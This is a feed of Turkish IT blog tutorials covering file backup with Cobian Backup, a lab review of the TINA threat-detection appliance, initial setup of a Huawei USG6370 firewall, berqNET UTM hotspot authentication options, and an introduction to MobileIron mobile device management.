eğer yerel bir dizine yedek alıyorsanız, Local/Network Folder diyerek alan seçimine başlıyoruz.


clip_image006

Open folder kısmından alan seçebileceğimiz gibi alanı doğrudan yapıştırarak da girebilirsiniz.
username/password kısmında uzak hedefteki klasöre veri yazma yetkisi olan bir kullanıcı seçmelisiniz.

İsterseniz bu yedeği zamanlayabilirsiniz.


clip_image008

Yukarıda da belirttiğim gibi, zamanlarsanız uzaktaki alan dolmadığı sürecek bu işlem devam edecektir.

Uygulama tabanlı yedek almanın size faydası nedir?
+ bulut ortamlara düzenli yedek alabilirsiniz
+ yedek aldığınız alanı ağ diski olarak belirlemediğiniz için herhangi bir saldırı da yedeklerinizi korumuş olursunuz
+ zamanlı yedek işi oluşturmuş olursunuz.

Dosya ve dizinleri yedeklemek - Cobian Backup:
Cobian Backup güçlü ve servis tabanlı bir yazılımdır.
Ayrıca şu gerçeği de ısrarla hatırlatmak isterim. Bu yazıda konu olmuş yazılımlara alternatif olarak sayısız yazılım bulunabilir. Bunlar benim basit, kullanışlı ve free alternatifler olarak sunduğum yazılımlar. Buradaki amaç, yazılım tanıtımı değil, yol ve yöntemi göstererek korunmayı amaç edindirmektir.

Cobian Backup'ı indirmek için : Tıklayınız
Yazılımı indirip kurduğunuz anda servisi de kurulur ve çalışmaya başlar.

clip_image010

Görev- yeni diyerek yeni bir görev oluşturuyoruz. Ve ismine örnek olarak FileSrv diyoruz.


clip_image012

Genel tabında önemli olan yer yedeklemenin türüdür.
Burada tam-farklı-artırımlı gibi seçenekleri belirleyebilirsiniz.
Bu terimlerin ne anlama geldiğini bilmiyorsanız, şu adresteki geniş makaleyi inceleyiniz:
Tıklayınız

Dosya kısmına geçtiğimizde kopyalanacak alan ve hedefi seçiyoruz. Hedef yalnızca yerel ve uzak dosya diskimiz veya FTP alanımız olabilir.  GoodSync gibi Pro yazılımları satınalarak çok daha geniş hedef seçeneğine erişebilirsiniz.


clip_image014

Zamanlayıcı kısmından, yedek alınmasını istediğimiz zamanlamayı seçiyoruz.


clip_image015

İşi oluştururken filtre seçeneği uygularsanız, bazı dosya uzantılarını veya bazı zararlı çalışmaları yedeğe dahil etmeyebilirsiniz.


clip_image017

Bu dosyaları dışla seçeneğinde belli uzantıları seçerseniz, bu uzantılar yedeğinize dahil olamayacaktır.

Daha sonra gelişmiş ve olaylar seçeneklerinde isterseniz yedeğinize şifre koyabilir, sıkıştırabilir veya diğer seçeneklere bakabilirsiniz.

Temel amaç, dosya ve veritabanlarımızı güvenli bir yere yedekleme yapmaktı. Bu kapsamda basit ve herhangi ücret ödemeden sahip olabileceğiniz yazılımlardan bahsettik.
Çok daha gelişmiş yazılımlara ücret ödeyerek sahip olabilir, aynı mantık kurgusu içinde dosyalarınızı buluta ya da farklı lokasyona uygulama tabanlı yedekleyebilirsiniz.

Avantajları :
+ Yedekleme alanına Windows değil, uygulama bağlandığı için yedek alınan alan herhangi bir zararlıya maruz kalsa da yedeklenen alanı korumuş olursunuz.
+ Zamanlı iş oluşturduğunuz için, unutsanız dahi yedekleme işlemi devam eder

Ülkemiz bilişimcilerinin yapamadığı 3 eylem var.
+ Yedek
+ Yedek
+ Yedek

İşinizi şansa bırakmayın.

TINA – Threat Intercepting Network Appliance - Detay inceleme

$
0
0

Yazımızın bu bölümünde öncekimakalemizindevamıolarakTINA'nınbağlıolduğuağdahazırladığımsanalmakinalarilebirdizitestleryapmayakararverdik. “verdik” diyorum çünkü diğer ekip arkadaşlarımda ürünün başarısı karşısında test süreçlerine dahil oldular. İlk olarak TINA'raporlamamodundabırakmaya karar verdik ve uyguladık.

 

Hatırlarsanız ilk makalemizde TINA ‘yı genel hatları ile inceledik. 2nci Makalemizde belirttiğimiz bilinen, yani daha önce tehdit kaynağı olmuş, zararlı içerik barındıran kaynakları denedik. Kaynaklar diyoruz çünkü bunlar hem IP adresi hemde alan adı olabiliyor. Dolayısıyla tüm tehdit noktalarını inceleyerek total bir sonuç elde etmeyi hedefliyoruz.

 

3. makalenimizde ise çeşitli aksiyonlar ve denemeler yaparak Tina tarafında süreçlerin nasıl işlediğini inceledik. ilkolarak lokal güvenlikzafiyeti ortaya çıkarabilecek birInternet Explorer ile crack / keygen arşivlerininolduğuundergroundtarzındasitelerigezmeyebaşladım. İsmini zikredemediğim bir sürü sitede çeşitli aramalar yaptım. YaklaşıkyarımsaatsonraTINACTMservisindenbiruyarıe-postasıaldım.

 

Detaylarıöğrenmekiçinlog'larabaktığımdazafiyetiolanIE'ninbirzararlının sistemime yerleşmişolabileceğini sizde görebilirsiniz.

 

 

clip_image002

 

CSI raporundan zararlınınanaliziniincelediğimde zararlı yazılımların sisteme bulaştığında nelerideğiştirdiği, iletişim için hangiportlarıaçtığıkısacasınelerikurcaladığınıgörebiliyoruz. Ayrıca Uyarı Tipi: Daha Önce Tanımlanmamış demesi de bu saldırının daha önce bilinmeyen bir kaynak olduğunu anlatıyor.

 

Bunlar yaşanırken aynızamandabuzararlıartıkstatiklisteleriledurdurulabilmesiiçindiğerTINAcihazlarınailetilmeküzereTINACTMistihbaratpaylaşımınagitmişti bile. CTM TINA ‘nın merkezi tehdit birimi ve neredeyse anlık güncellemeler ile zero-day kaynaklarının paylaşımını sağlıyor.

 

İkinci deneme olarak mobil uygulama denemeye karar verdik. Android bir sistem ile masum gibi durmayan bir paket çalıştırdık. TINA  bu sefer zararlıandroidpaketiolanAPK'inceledivebuseferkodstatikanalizmetoduileyenibirraporoluştu. Rapor içeriğinde bu paketin daha önce tanımlanmadığı ama zararlı yazılım içerdiği tesbit edildi.

 

clip_image004

Diğertestlerimi ise halihazırdaiçeridezararlıkodçalıştırabildiğinivarsaydığımbirsaldırganolarakyapmayakararverdim. Bir usb stick ile forumdan indirdiğimspamyapanbotnetparçasızararlıyısanalmakinalardanbirinekurdum. Biraz sonra yine loglarıincelediğimdebusanalmakinanınağdataramayaptığına dair satırlargördüm. Aslındabuzararlıkodağdabiropenrelay”SMTPsunucuarıyordu. İçağdayayılanbutaramadagidipgelenpaketlerTINAtarafındantakipedildiğiiçinuygulamabunoktadaalarmverdi.

 

clip_image006

 

Daha sonrasındabirlogdahadüştü. Busefer honeypot servislerinden biri tetiklenmişti. İncelediğimdeTINA'nın 25. portundaçalışanSMTPhoneypot'unagelenzararlınınloguolduğunugördüm.

 

clip_image008

 

TINA birçokservisiçinsahteservisleryanihoneypot tanımlarıiçeriyor. Saldırgankişininveyazararlıyazılımındikkatiniçektiğitakdirdeaslındaalarmlarıtetiklemişoluyorlar. İçerikadargirebilmişbirietrafabakınmadançekipgitmeyeceğiiçinbuservisleraslındaoldukçaönemli.

 

Birazda CTM arayüzüne bakalım isterseniz, Web arayüzü oldukça güzel renklerle bezenmiş ve anlaşılır şekilde detaylandırılmış. Demo ortamı olduğu için çok fazla veri içermesede, sizlerde biliyorsunuzki bu tip cihazlar log üretmek için zamana ihtiyacı vardır.

 

Arayüz ise şu şekilde karşımızda

 

clip_image010

 

 

Günlük tehditler ortalama analiz ve aktif cihazlar şeklinde başlıklar dikkat çekiyor. Aşağıda pasta şeklindeki ekranda ise karşımızda duran atakların hangi ülkelerden geldiği konusunda bilgi veriyor.

 

Ekranı biraz aşağı indirdiğimizde ise dünya genelinde neler var neler yok grafiklerine ulaşıyoruz,

 

 

clip_image012

 

Fark ettiğiniz gibi ürün Türkiye’de geliştirildiğinden arayüz tamamen Türkçe. Tabi tüm kelimeleri Türkçeye çevirmek mümkün değil. Çevirdiğimizde çok daha garip ve anlamsız hale gelebiliyor.

 

Güncel olaylar detayında da yine derinleştirilmiş detaylar bulabiliyoruz.

 

clip_image014

Ürün teknik ekipte bulunan tüm arkadaşlar tarafından incelendi ve gerekli şekilde doyurucu bilgi aldık. Kısaca özetlemek gerekirse, TINA’yı firewall’ın önüne koyduğunuzda eğer CTM merkezi tarafından bilinen zararlı bir kod içeriye ulaşamaz. Eğer zararı CTM tarafından bilinmeyen bir kod ise hemen bilgileri CTM’e gönderilir ve o zararlı yazılım kodunun dışarıya çıkması durdurulur. Dolayısıyla sizde hangi makinadan ne zarar vermeye çalışıyor anlar ve önlem alabilirsiniz. Yani uzun zamandır içerde bir virüs var ama hangi makinada sorusunu hayatınızdan silmiş olursunuz. Yaptığımız incelemelerde hiçbir şekilde zararlı kod içeri giremedi. TINA hepsini başarıyla tanıdı. Ve içeride USB ile çalıştırdığımız kod’da dışarı çıkamadı. Başarı seviyesi bence mükemmel. Kurumlarınızda olmazsa olmaz cihazlardan biri TINA.

 

Kolay gelsin.

Huawei USG6370 Firewall Kurulum ve Konfigürasyon Bölüm-1

$
0
0

Bu makalede 3 bölümden oluşacak olup Huawei USG6370 firewall cihazının basit kurulumu ve ilk ayarlarının nasıl yapıldığını göreceğiz.

Makale sonunda cihazı kurup basit yapılandırmalarını yaparak cihaz hakkında azda olsa belirli bilgiye sahip olmuş olacağız.

Ürün görsel olarak aşağıdaki gibidir. Üzerinde 1 adet Managemet, 8 Adet UTP, 4 adet SFP port bulunmaktadır.

clip_image002

Cihazın default ip adresi 192.168.0.1 olup bu ip adresi ile sadece MGMT port ile erişmeniz mümkündür.

clip_image004

Cihaza bağlanmak için öncelikle yapılaması gereken bilgisayarınızın ağ kartına yukarıda belirtmiş oluğumuz network üzerinden ip vermeniz gerekmektedir.

 İp yapılandırmanız aşağıdaki gibi yapılabilir.

clip_image006

Bilgisayarınızda bağlı olan kablonun huawei firewall tarafında aşağıdaki görüldüğü gibi MGMT portuna takılmalıdır.

clip_image008

Cihazın default olarak gelen Kullanıcı adı: AdminŞifresi Admin@123şeklindedir.

 

Bu işlemleri tamamladıktan sonra web tarayıcımıza https://192.168.0.1 yazıyoruz.

clip_image010

Karışımıza yukarıdaki gibi ekran geliyor.

 clip_image012

Yukarıdaki ekranda Kullanıcı adı Adminşifre olarak Admin@123 olarak yazıyor ve login diyoruz.

clip_image014

Login işleminden sonra karşımıza default şifrenin değişmesi için bir ekran geliyor bu ekranda Current Password yazan kısıma eski şifremizi yazıyoruz ve diğer alanlara kendi belirlediğimiz şifreyi yazarak OK deyip geçiyoruz.

Yukarıdaki işlem sonucunda karşımıza aşağıdaki gibi ekran geliyor ve artık firewall web arayüzüne girmiş oluyoruz.

clip_image016

Karşımıza gelen ilk ekran Startup Wizard ekranı olup, kurulumu bu ekran üzerinden yapacağız.

Startup Wizard ekranını kullanmadan da yapacak olduğumuz işlemleri yapmak mümkün ama biraz karmaşık gelmesi muhtemel bu sebepten wizard kullanmamız daha iyi olacaktır düşüncesindeyim.

İlk ekranı Next diyerek geçiyoruz.

clip_image017

1.      Bölümde Bizden firewall cihazıma bir isim vermemiz aynı zamanda şifre değişikliği yapmak istersek bu kısımdan yapabileceğimiz göstermekte.  Next diyerek geçiyoruz.

clip_image018

2.      Bölümde kendi ülkemize uygun saat dilimini seçerek devam ediyoruz.

clip_image019

3.      Bölüm İnternet ayarlarımızın yapılacağı kısımdır. Aşağıda görüldüğü üzere 3 ayrı kısım bulunmaktadır.

clip_image020

 

1-Statik ip

Statik ip kısmını kullanacak olan kullanıcıların almış oldukları internet hizmetlerinin metro internet gibi yada benzeri çalışan hizmetlerin internet sağlayıcısı tarafından kendilerine verilen ip adresi –subnet- Gateway bilgilerini girmeleri gerekmektedir. Öncelikle sizden internet hattınızın firewall cihazının hangi portunda sonlanacağını sormaktadır.

clip_image022

Biz GE 1/0/0 portunu kullandık ve temsili bir ip adresi yazdık siz sizinle paylaşılan ip adresini bu kısma yazmanız yeterli olacaktır.

clip_image023

2.Dhcp

 Bu bölüm çok kullanılan bir bölüm değildir sahada pek karşılaşmazsınız bu bölüme girmeyeceğiz.

clip_image024

3-Pppoe

Bu bölümde internet sağlayıcımız bize vermiş olduğu modemler ya da router cihazlarının köprü ( bridge) moduna alınarak kullanılan alandır.

Örnek verecek olursak iş yerinde ADSL ya da VDSL hat kullanıyorsunuz bu cihazın hemen önünde güvenlik için huawei firewall koyacaksınız ama sistemi huawei cihazının yönetmesini kontrol etmesini yönlendirme, vpn web filter apps filter gibi işlemlerin hepsini firewall cihazının yapmasını istiyorsunuz.

Durum böyle iken ilgili modemi köprü(Bridge) moduna almanız gerekmektedir. Bu işlemden sonra artık muhatap huawei firewall cihazı olacaktır.

Küçük bir ayrıntı köprü modunda internet servis sağlayıcısının size vermiş olduğu kullanıcı adı ve şifreyi bilmek zorundasınız örnek adsl12111@ttnet şifre xxxxxx şeklinde bu bilgileri huawei firewall cihazına yazmamız gerekecek.

clip_image025

Next işleminde sonra karşımıza aşağıdaki gibi ekran gelecek olup bize hangi interface ile işlem yapmak istediğimizi soracak

clip_image027

İlgili kısımları aşağıdaki gibi doldurarak next diyerek devam ediyoruz.

clip_image029

Next işleminden sonra karşımıza lan bacağına ip vereceğiz bu ip bizim ağ geçidimiz olacak ya da route görevini yapan cihazın internete çıkış trafiğini route ettiği ip olacak.clip_image030

İp olarak 192.168.1.254/24 şeklinde verip devam ediyoruz.

clip_image032

Sonrasında karşımızda ortamda bir dhcp sunucusu yoksa ip dağıtmak için ekran geliyor. Burada başlangıç ve bitiş aralığı belirtiyoruz.

clip_image034

Aşağıdaki gibi firewall cihazının kendi ip adresini aralık içeresinde tutmuyorum.

clip_image036

Next diyerek devam ettikten sonra aşağıdaki gibi yapmış olduğumuz işlemlerin özeti gelmektedir.

Apply diyerek devam ediyoruz.

clip_image037

Apply işleminden sonra en son olarak karşımıza aşağıdaki ekran gelmekte Finish diyerek işlemi sonlandırıyoruz…

clip_image038

Finish işleminden sonra karşımıza aşağıdaki gibi dashboard gelmekte

clip_image040

Kısaca ekranda 2 bölümden bahsetmek isterim…

System Resoruce bölümünde cihazın performans değerleri verilmektedir.

clip_image042

System Information bölümünde cihaz ile ilgili bilgiler bulunmaktadır.

clip_image044

Huawei firewall üzerinde şimdi yapmış olduğumuz işlemleri kontrol edelim

clip_image045

Yukarıdaki ekranda internet hattımızın default zone olarak untrust olarak gelmekte LAN olarak ta trust zone olarak gelmektedir.

Karışıklığa sebep vermemek için internet hattını WAN olarak LAN hattının da local ya da internal olarak değiştirmemiz yararımıza olacaktır.

Öncelikle 2 adet zone ekleyelim ve istediğimiz interface bu zone dahil edelim aşağıdaki menüleri takip ederek.

clip_image047

Aşağıda görüldüğü üzere WAN şeklinde bir zone oluşturduk.

clip_image049

Daha sonra WAN zone üzerine almak istediğimiz interface üzerine gelerek tıklıyoruz

clip_image050

clip_image052

Yukarıda görüldüğü üzere zone kısmından untrust olan zone adını WAN olarak değiştirdik.

clip_image054

Şimdi LAN olarak bildiğimiz zone trust zone a dahil yani biz internete çıkış kurullarını yazarken

Trust to Wlan olarak yazmamız gerekmekte

clip_image055

Huawei cihazında default olarak policy yazılı şekilde gelir. Bu poliçede ip zone servise bakmazsınız trafiği geçirir ilk kurulumda bu şekilde ama bu sonrasında ciddi sıkıntı yaratacaktır güvenlik olarak size sıkıntıya sokacaktır.

clip_image057

Şimdi örnek olarak 1 adet internete çıkış için policy yazacağım ve default olan policy deny yapacağım yani yazdığım policy geçerli olacak ve yazdığım policye dahil olmayan kimse internete çıkmayacak

clip_image059

 

clip_image061

Aşağıda görüldüğü üzere sadece trust zone dan gelen kişiler internete çıkacaklar ve her hangi bir ip ya da user kısıtlaması yapmadım.

clip_image062

Policy kısmının son hali aşağıdaki gibidir.

clip_image064

Sistem üzerinde 192.168.1.0/24 networkünden farklı networkler olması muhtemel durum böyle iken zaten bu networkler firewall cihazına ya route aracılığı ile geliyordur ya da farklı interface lere bağlıdır.

Bir switch üzerinden route ile firewall cihazına gelen network den  bahsedeceğim

 Örnek: Sistemde 172.16.16.0/24 networkü olsun ve bu networkünde yine firewall üzerinden internete çıkması gereksin durum böyle iken zaten biz daha önce policy yazmıştık source olarak any seçmiştik burada yapacak bir şeyimiz kalmadı sadece 172.16.16.0 networkünün firewall cihazı ile haberleşmesi kaldı.

Sistemdeki switch ip adresimiz 192.168.1.1/24 olsun

 172 li network içinde 172.16.16.1/24 olsun

Her iki network switch üzerinde bulunan routing ile haberleşecekler ama firewall cihazı 172li networkü tanımayacak durum bu şekilde iken switch üzerinde aşağıdaki gibi route olduğunuz varsayarsak clip_image066

Aşağıdaki gibi route yazmamız gerekmektedir.

clip_image068

Destination address ulaşacağımız network

Next hop bu networke ulaşmak için soru soracağımız ip

İnterface soru sormak için gideceğim yere hangi port üzerinden gitmem gerektiğini belirten alan

clip_image070

Cihazın yeni route tablosu aşağıdaki gibidir.

clip_image072

Huawei cihazına şuanda MGMT zone dan başka bir zone üzerinden erişmemiz mümkün değil bunun için trust zone için http ya da https bağlantısını açmamız gerek default olarak kapalı gelir.

clip_image074

Ayrıca interface içerinse girmek için edit kısmı da kullanılabilir.

clip_image076

Yukarıda görüldüğü üzere ilgili erişim şekillerinin açılması mümkündür.

Cihaza son olarak Console üzerinden erişip yaptığımız ayarları da CLI ekranından görebilirsiniz.

Putyy yazılımı ya da benzeri yazılımları kullanarak ekrandaki ayarlar doğrultusunda

clip_image078

 

clip_image080

 

clip_image082

 

clip_image084

 

Yukarıdaki komutu yazarak cihaz üzerinde neler yaptığımızı görmek mümkün

Config olarak hepsini almadım sadece yaptığımız alanları göstermek istedim DNS ile ilgili alan aşağıdaki gibi

clip_image086

İlgili interface ler için verdiğimiz ipler ve dhcp ayrıntıları

clip_image088

Yarattığımız zone

clip_image090

Yazmış olduğumuz route

clip_image092

Yazmış olduğumuz policy

clip_image094

Ayrıca web üzerinden yaptığımız çoğu işlemi CLI üzerinden de yapmamız mümkün örnek olarak zone oluşturma yapalım. Aşağıdaki komutu CLI üzerinde koşturmamız yeter

clip_image096

Bu komutu çalıştırdıktan sonra içerisine giriş yapalım

clip_image098

Priority vermemiz gerek

clip_image100

Aşağıdaki ekranda görüldüğü üzere WAN1 zone olarak geldi.

 

clip_image102

Bu bölümün sonuna geldik diğer bölümde görüşmek üzere…

berqNET UTM ile Hotspot

$
0
0

Bu makalede sizlere berqNET UTM cihazları ile nasıl hotspot yönetimi yapılacağını anlatacağım. Hotspot yönetimi misafirlerinize ve müşterilerinize kontrollü bir şekilde internet erişimi sunmanıza olanak sağlar, tüm bağlantıların logları 5651 yasasına uygun olarak tutulabilir.

Bir misafir veya müşteriniz hotspot yönetiminin devrede olduğu bir ağa bağlandığında öncelikle internet erişimi için yetkilendirilmiş olup olmadığı kontol edilir. Yetkilendirilmiş ise yetkileri çerçevesinde internet erişimine izin verilir. Yetkilendirilmemiş ise, kullanıcının tarayıcı ekranında belirlenen yetkilendirme yöntemine göre tasarlanmış bir kullanıcı ekranı açılır ve gereken bilgileri (örneğin kullanıcı adı ve şifre) girmesi istenir. Bu bilgiler doğru şekilde girilirse erişime izin verilir.

berqNET üzerinde 4 çeşit hotspot yetkilendirme yöntemi kullanılabilir.

·       Manuel yetkilendirme

·       SMS ile yetkilendirme

·       TC kimlik no ile yetkilendirme

·       Otel veritabanı ile yetkilendirme

Hotspot özelliğini kullanmak için öncelikle berqNET yönetim ekranındaki Ayarlar bölümünde Servis Ayarları -> Hotspot ekranından özellik aktif edilir.

Hotspotun açılacağı cihaz arayüzü bu bölümden seçilir.

clip_image002

Gelen sayfada hangi yetkilendirme yöntemi kullanılacak ise seçilir. Birden fazla yetkilendirme yönetimi seçilebilir.

Yetkilendirme seçilerek ileri butonuna basıldığı zaman açılan Yönetici ayarları bölümünden hotspot yönetici panelinin giriş bilgileri tanımlanabilir.

 

clip_image004

Oturum ayarları sayfasından ekrandaki gibi hotspot oturum işlemleri ile ilgili seçimler yapılabilir.

Eş zamanlı oturum sayısı belirlenebilir.

Manuel olarak tanımlanmamış kullanıcı tipleri için oturum süresi tanımlanabilir veya varsayılan oturum süresi olan 120 dakika kullanılabilir.

Başarılı oturum açmış kullanıcının oturum süresi içerisinde kendi istediği zaman oturumunu sonlandırmasına izin vermek istenirse “Kullanıcı manuel çıkış yapabilsin” seçeneğine onay verilebilir.

Oturum açıldıktan sonra kullanıcı belli bir adrese yönlendirilmek istenirse bu adres Yönlendirilen Sayfa alanına girilebilir.

clip_image006

Kullanıcı ayarları sayfasında hotspot kullanıcılarının göreceği arayüze ilişkin özelleştirme işlemleri yapılabilir. Arka Plan sekmesinde kullanıcı arayüzünün arka planına ilişkin değişiklikler aşağıdaki şekilde yapılabilir. Sayfa , başlık , panel rengi değiştirilebilir. Arka plana bir resim yerleştirilebilir.

clip_image008

Müşteri Logosu ekranında bir logo dosyası yüklenebilir, gösterileceği boyut (küçük-orta-büyük) ve ekrandaki bölgesi seçilebilir. Logoya tıklandığında gidilecek link de belirtilebilir.

clip_image010

Yazı Stili ekranında yazı tipi, boyutu ve rengi seçilebilir.

clip_image012

Arayüz Metinleri ekranında, kullanıcı arayüzünde yer alan metinler değiştirilebilir. Öncelikle dil seçimi yapılmalıdır. Arayüzdeki metinler kullanıcının tarayıcısının diline göre kullanıcıya sunulmaktadır. Sistem üzerinde Türkçe, İngilizce, Almanca ve Rusça metinler otomatik yer almaktadır. Bu dillerdeki metinler değiştirilebileceği gibi farklı diller için de metinler bu ekrandan girilerek o dilde gelen tarayıcılara yönelik özelleştirme yapılabilir.

clip_image014

 

Manuel Yetkilendirme

Manuel yetkilendirme seçeneği ile hotspot kullanıcıları manuel olarak tanımlanıp internet çıkışı sağlanabilir. Kullanıcılar hotspot yönetici paneli üzerinden oluşturulur.

Hotspot yönetici paneline https://arayüzgirişIPsi/hotspot şekilde bağlanılabilir.

Örnek: https://192.168.12.1/hotspot

clip_image016

Hotspot yönetici panelinde sol alt kısımdaki ekleme butonu tıklanarak kullanıcı ekleme işlemi yapılabilir. Oluşturulan kullanıcıları silmek veya düzenlemek için yine sol alt köşedeki butonlar kullanılabilir.

Aşağıdaki ekranda görüldüğü gibi kullanıcı Süre Tanımlı ya da Tarih Tanımlı olarak oluşturulabilir. Şifre manuel olarak oluşturulabilir veya “şifre üret” seçeneği tıklanarak sadece şifre uzunluğu belirlenir ve şifre otomatik olarak üretilir.

clip_image018

 

SMS ile Yetkilendirme

SMS ile yetkilendirme seçeneği kullanıcıların internet erişimi için cep telefonuna SMS ile gelen şifreleri ile internet erişim hizmetini alma modelidir.

Bu özellik için öncelikle berqNET UTM’in desteklediği sağlayıcılardan SMS satın alınması gerekmektedir.

Örnek birSMS yetkilendirme için gerekli ayarlama seçenekleri aşağıda yer almaktadır. Aşağıda istenilen kullanıcı adı ve şifre bilgileri SMS satın alınan hizmet sağlayıcı tarafından iletilmiş olmalıdır. Bir diğer bilgi kutusunda ise SMS şifre uzunluğu seçeneğinde gönderilecek şifrenin karakter uzunluğu belirtilebilir. Şifre geçerlilik süresinde ise SMS ile gönderilen internet hizmetinin kullanım süresidir.

 

clip_image020

SMS ile yetkilendirme işleminin kullanıcı giriş arayüzü aşağıda görülmektedir. ‘SMS ile kullanıcı bilgisi almak istiyorum’ seçeneği işaretlenerek telefon numarası girilir. Kullanıcı adı kısmına isim şifre kısmına ise telefona gelen SMS içindeki şifre girilerek internet çıkışı yapılabilir.

 

 

clip_image022

 

Otel Veritabanı ile Yetkilendirme

Bu yetkilendirme modelinde şu an için EuroProtel ve Basit Otel entegrasyonları desteklenmektedir. Bu entegrasyon modelleri sayesinde kullanıcılar oda numaraları ve soyad bilgilerileri ile internet hizmetini alabilmektedirler.

Otelde kullanılan EuroProtel veya Basit Otel bilgilerinin aşağıdaki alanlara tanımlanması gerekir.

clip_image024

clip_image026

 

Kullanıcı giriş sayfası örneği:

clip_image028

 

TC Kimlik No ile Yetkilendirme

TC kimlik no ile yetkilendirme seçildiği zaman giriş ekranında istenilen ‘ad, soyad, TC kimlik no ve doğum yılı’ bilgileri Nüfus ve Vatandaşlık İşleri Genel Müdürlüğü kimlik doğrulama sisteminden doğrulanırsa internete çıkış sağlanmaktadır.

clip_image030

Birden fazla yetkilendirme yöntemi seçildiğinde seçilen yöntemlere göre aşağıdakine benzer bir karşılama ekranı oluşacaktır, kullanıcı hangi yöntemi isterse o şekilde bağlanmayı deneyebilir.

clip_image032

Makalemizin sonuna geldik, umarım faydalı bir makale olmuştur, bir sonraki makalemizde görüşmek üzere.

Mobil Cihaz Yönetimi Nedir? ve MDM Çözümü MobileIron' a Giriş

$
0
0

Hızla gelişen mobil cihazlarında etkisiyle daha mobil bir geleceğe doğru koşar adımlarla ilerliyoruz. Bu yüzden de bilgi teknolojileri çalışanlarının bugün ki sorunu ve yarının kaosu diyebileceğimiz bir durumla da karşı karşıyayız.

Sorunumuzun kökeni kurumumuzun iş süreçlerinin artık bizim yönetemediğimiz, farklı farklı işletim sistemlerine sahip mobil cihazlar üstünden yürütülüyor olmasıdır.  Mobil cihazların yönetilememesinin yanında şirket bilgilerinin korumasız bir ortamda bulunması da endişe verici bir durumdur.

Kısaca Mobil Cihaz Yönetimi (Mobile Device Management (MDM), mobil cihazların işletim sistemlerini, üzerindeki uygulamalarını ve kurum bilgilerini yönetmemizi ve güvenliğini sağlamamız sağlar.

Bu makale serimizde MDM çözümü olarak MobileIron’ın incelemesini yaparak, demo ortamında testlerimizi gerçekleştireceğiz.

MobileIron’nın bileşenlerine baktığımızda aşağıdaki resim bütünü görmek ve anlamak adına çok yardımcı oluyor.

clip_image002

MobileIron, mobil işletim sistemlerinden IOS, Android, Windows işletim sistemlerini yönetebiliyor. Bu yönetimi de CORE olarak tanımladığı Merkezi Yönetim Konsolu ile sağlıyor.

SENTRY’nin göreviyse kurum ağı dışında çalışırken şirketimize erişmesi gereken, mobil veya web uygulamalarımızın uygulama bazlı VPN teknolojisi sayesinde şirket ağına güvenli bir şekilde erişimini sağlıyor. Örnekle anlatmak gerekirse kurum intranet sayfasına erişmek istiyorsunuz, web linki tıkladığımız zaman arkaplanda sadece intranet için VPN bağlantısı yapılıyor ve erişim sağlanıyor. Bu esnada diğer web sitelerine erişiminiz operatörün internet hizmeti üzerinden, şirket ağınıza ulaşmadan, devam ediyor. Bu şekilde mobil cihazlardaki olası güvenlik sorunlarından kurum ağınız etkilenmemiş oluyor.

MobileIron’da üç farklı bundle lisanslama modeli bulunuyor.

clip_image004

Kısaca Silver Bundle lisanslamada cihaz ve uygulama güvenliğini sağlayabiliyor, Gold’da uygulama ve içerik sunabiliyor ve yönetebiliyor, Platinum Bundle’daysa cihaza uzaktan erişim sağlayabiliyor ve gelişmiş güvenlik özelliklerine sahip oluyoruz.

MobileIron’un lisanslaması hakkında daha fazla bilgi almak için aşağıdaki linke bakabilirsiniz.

https://www.mobileiron.com/en/products/pricing-and-packaging

MobileIron’u test etmek için Kurumsal mail adresinizle aşağıdaki linkten 30 günlük demo başvurusu yapabiliyorsunuz.

https://www.mobileiron.com/en/webform/30-day-trial

clip_image006

Mail adresinizi girdikten sonra hangi özellikleri test etmek istediğimizi ve hangi işletim sistemlerini yönetmek istediğimizi seçiyoruz ve Continue ile devam ediyoruz.

clip_image008

Gerekli bilgileri girdikten sonra Submit ile başvurumuzu sonlandırıyoruz.

MobileIron demo ortamı hazırladıktan sonra erişim için gerekli bilgileri iletecektir. Bu işlem biraz vakit alabilir.

clip_image009

Demo ortamı erişim için gerekli link ve sisteme giriş yapmak için gerekli kullanıcı adınız ve şifreniz elimize ulaştıktan sonra demo sürecine başlayabiliriz.

 

 

clip_image011

İlk ekran olarak sisteme ilk defa girdiğimiz için şifremizin değiştirmemiz gerekir. Devamında daha öncede bahsettiğimiz CORE yani Merkezi Yönetim Konsolu ekrana geliyor.

Dashboard ekranında mobil cihazlarımızın durumları hakkında genel bilgi alabiliyoruz. Şu an sistemde yönetimi yapılan herhangi bir cihaz olmadı için istatistikler boş geliyor.

clip_image013

İlk makalemizde bir mobil cihazı sisteme eklemeyi deneyelim. Makale serimizin devam makalelerinde mobil cihazlar için nasıl politikalar yazacağımızı ve şirketimizde geliştirdiğimiz veya iTunes, Google Play yada Windows Store’daki uygulamaları mobil cihazlarımıza nasıl otomatik olarak yükleyeceğimizi veya güncelleyebileceğimizi detaylıca göreceğiz.

CORE’daki ikinci tabda bulunan Devices & Users tabına geçiyoruz.

clip_image015

Eğer MobileIron, Active Directory’miz ile konuşuyor olsaydı AD’deki kullanıcılarımıza veya gruplarımıza yetki verebilirdik. Normalde bir kullanıcının cihaz ekleme hakkı varsa ve gerekli bağlantı bilgilerini biliyorsa mobil cihazından Mobile@Work’u indirip bu işlemlere gerek kalmadan mobil cihazını sisteme dahil edebilir.

Biz demo ortamında olduğumuz için lokal kullanıcı açarak, mobile cihazı bu lokal kullanıcı adı ve şifresi ile sisteme ekleyebiliriz.

clip_image017

Users tabına tıklıyoruz ve sistemde şuanda bir admin kullanıcısı olduğunu görüyoruz. Bu kullanıcı ile de mobil cihazı sisteme ekleyebiliriz ancak yeni bir kullanıcı açıp ilerleyen zamanlarda onun üzerinde bazı kurallar uygulamak istediğimiz için Add menüsündeki Add Local User’a tıklıyoruz.

clip_image019

Açılan popupta gerekli alanları dolduruyoruz ve Save ile kaydediyoruz.

clip_image021

Eğer MobileIron, Active Direcktory’miz ile konuşuyor olsaydı kullanıcıların Users tabına kaydolması için Resync With LDAP’ı tıklamamız yeterli olacaktı.

Lokal kullanıcının kaydedildiğini görüyoruz ve Devices tabına geçiyoruz.

clip_image022

Devices tabına geldiğimizde sisteme henüz cihaz eklenmediğini görüyoruz. Eklemek için Add’i tıklıyoruz. Burada iki seçenek var biri Single yani tek cihaz eklemek için diğeri de Multiple birden çok cihaz eklemek için kullanılıyor. Single ile ilk cihazımızı ekliyoruz.

clip_image024

Mobil cihazımızı hangi kullanıcının kullanacağını ve cihazın hangi platformda çalıştığını seçtikten sonra kullanıcının cihazı kaydetmesi için gerekli bilgileri Email ile mi yoksa SMS ile mi ileteceğimizi seçip Register’a tıklıyoruz.

clip_image026

